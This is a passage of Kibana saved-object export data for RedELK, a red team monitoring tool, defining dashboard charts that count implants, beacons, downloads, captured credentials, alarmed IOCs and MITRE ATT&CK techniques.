IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2235], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2237], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.2", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642152856829, 2238], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.2", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2240], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.2", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1642152856829, 2245], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.2", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2247], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2249], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2251], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.2", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2253], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2255], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.2", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2257], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2259], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2261], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector IP\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"infra.attack_scenario\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Scenario\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":false,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top new implants by ext IP address and scenario\"}"}, "coreMigrationVersion": "7.16.2", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2264], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Cloud Tag", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IDs\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"threat.technique.id\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other TTPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"TTP\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - TTP Cloud Tag\"}"}, "coreMigrationVersion": "7.16.2", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2266], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: \\\"implant_newimplant\\\" AND (NOT tags: testsystems_V* )\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - Top users with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Top users with new implants\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":false,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}]}"}, "coreMigrationVersion": "7.16.2", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2268], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per host and user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other users\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other hosts\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Tasks per host and user\"}"}, "coreMigrationVersion": "7.16.2", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2270], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials captured\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Credentials captured\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Credentials captured\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Credentials over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2272], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":14,\"maxFontSize\":58,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Techniques tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2274], "type": "visualization", "version": 